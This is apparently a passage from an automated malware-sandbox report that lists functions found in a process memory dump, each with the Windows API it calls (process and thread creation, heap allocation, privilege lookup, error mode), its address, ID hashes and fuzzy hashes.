                                      • Instruction ID: 6a39b7520b3d4876a411c9f621b2ff8686caaf9f0da9182262710e90a8617d32
                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction Fuzzy Hash: 45011EB5E4020DBBEF10DAA4DC41FDDB7B8AF44708F104595AA09A7240F671FB148BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A6DD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04D7A734
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 69130d7bdf9084143b0434511f49728ad3f2409834004126ff15b7f53631e3e9
                                      • Instruction ID: b1591cfdc20c237ba27d6c9d6342ed7909ddad6782d371bf68f157a0cc81bf8c
                                      • Opcode Fuzzy Hash: 69130d7bdf9084143b0434511f49728ad3f2409834004126ff15b7f53631e3e9
                                      • Instruction Fuzzy Hash: C601AFB2214108AFDB54DF99DC80EEB77AAAF8C754F158258FA0DD7250D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04D7A734
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: dfe0bdeba7478b73228c45ebed2b5897373adb40c5da7c14acf46d5fc9257fee
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 8901AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D791B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04D6F050,?,?,00000000), ref: 04D791EC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: e6864212cec58bb16d898c30f46e9f2b1993be37a127272d075349a2dc59e61b
                                      • Instruction ID: 049f4f7710d6e970230440585292faaa6ab08ca34642c994be70a9470f839a84
                                      • Opcode Fuzzy Hash: e6864212cec58bb16d898c30f46e9f2b1993be37a127272d075349a2dc59e61b
                                      • Instruction Fuzzy Hash: 3BE092733813043AF7306599AC02FA7B39CDB81B74F14002AFA0DEB2C0E995F40142A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D791AF, Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04D6F050,?,?,00000000), ref: 04D791EC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 245cfdcf418d8ab6fb544c9163bd6c18b1ef8c4dfbef0b0b1b9474d0affeb51f
                                      • Instruction ID: ab3836bff6dcefb83e33f316f2fe29997bbd582f35645c39b3583b06fb1c4f3b
                                      • Opcode Fuzzy Hash: 245cfdcf418d8ab6fb544c9163bd6c18b1ef8c4dfbef0b0b1b9474d0affeb51f
                                      • Instruction Fuzzy Hash: 77E0D8733802003AF73066689C43FE77798CF91B20F140019FA49AB2C1E995F80146A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A630, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.00000009.00000002.932154419.00000000050C0000.00000040.00000001.(04D74536,?,04D74CAF,04D74CAF,?,04D74536,?,?,?,?,?,00000000,00000000,?), ref: 04D7A65D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateC0000.00000040.00000001Heap.00000009.00000002.932154419.00000000050
                                      • String ID:
                                      • API String ID: 1433232253-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 81dbf39b390115ce03af64a11e4bd8d26c8972a81c1391d17b565f50f0e2a390
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: E6E046B1200208ABDB14EF99CC40EAB77ACEF88654F118559FE085B341C630F910CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,04D6F1D2,04D6F1D2,?,00000000,?,?), ref: 04D7A800
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: cd6d908c05df68e6765c3fdf865194c803d2426bb4af669121cdd8b90c4c6099
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: 9BE01AB12002086BDB10DF49CC84EEB77ADEF88654F118155FA0857241D930F8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D7A7CB, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,04D6F1D2,04D6F1D2,?,00000000,?,?), ref: 04D7A800
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 2fec95dbd57f8bb8595de5c0c12d67a1deaf23655696aadc36425ec16ec15d57
                                      • Instruction ID: db408477b9e02c4b96bbe6f8681700a5b92415554ab5b7adb049bc5b211ce12d
                                      • Opcode Fuzzy Hash: 2fec95dbd57f8bb8595de5c0c12d67a1deaf23655696aadc36425ec16ec15d57
                                      • Instruction Fuzzy Hash: E6E0DFB12042446FDB10DF65DC85EDB7FA8EF80210F148699FC885B202C934F515CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D6F6C7, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,04D68D14,?), ref: 04D6F6FB
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 45d8688550c4a9418d734937c74e878c661a0691b72690ec0c17b47b44d0bfe6
                                      • Instruction ID: abadc6d719a6e250f7be3e8dadde28b969127424b19dd4ebe026041bbdb9e656
                                      • Opcode Fuzzy Hash: 45d8688550c4a9418d734937c74e878c661a0691b72690ec0c17b47b44d0bfe6
                                      • Instruction Fuzzy Hash: 1AD02B297403042BF700FBE0DC03F2276859B45A14F150074FD49D73C3FC64E00041A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04D6F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,04D68D14,?), ref: 04D6F6FB
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, Offset: 04D60000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                      • Instruction ID: 1a377f250c9394e1a2815de1f8f83a5e384707560576998940d657d00d127d2a
                                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                      • Instruction Fuzzy Hash: 7DD05E617503082BE610AAA49C03F267289AB44A14F490064F949962C3E950F0004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions